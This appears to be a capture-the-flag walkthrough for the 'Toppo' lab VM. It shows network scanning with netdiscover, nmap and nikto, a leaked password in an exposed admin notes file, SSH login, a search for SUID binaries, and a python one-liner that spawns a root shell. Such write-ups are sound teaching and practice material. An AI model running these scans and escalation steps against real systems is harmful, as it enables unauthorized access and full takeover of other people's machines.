Firstly for finding out the IP I used netdiscover
# netdiscover -i eth0
then I did the nmap scan from which I found out the 3 open ports
# nmap -v -p 22,80,111,60752 -sT -sV -sC -A -O -oN nmap/toppo_initial 192.168.1.5
from looking at the nmap scan we can say that openssh and apache both are not vulnerable , so I visited 80 port which is simple blog template from bootstrap
http://192.168.1.5/
then for more information about the webserver I did the nikto scan
# nikto -h 192.168.1.5 -port 80
from nikto scan I find out that there is a directory name admin on webserver with directory indexing
http://192.168.1.5/admin
from admin we found out that there is a note file which can be helpful for us
http://192.168.1.5/admin/notes.txt
we found out a personal note revealing the password of admin for username I tried ted as its a part of password
# ssh ted@192.168.1.5
I created a session with ssh with the credentials we founded
now for privilege escalation I tried finding some files with suid permission on the machine
$ find / -perm -u=s -type f 2>/dev/null
from the given output we found out that python2.7 binary is having suid permissions which can be useful for us
$ python -c “import os; os.execl(‘/bin/bash’,’bash’,’-p’)”
with the above command we were able to get a root shell
FLAG
# cat /root/flag.txt
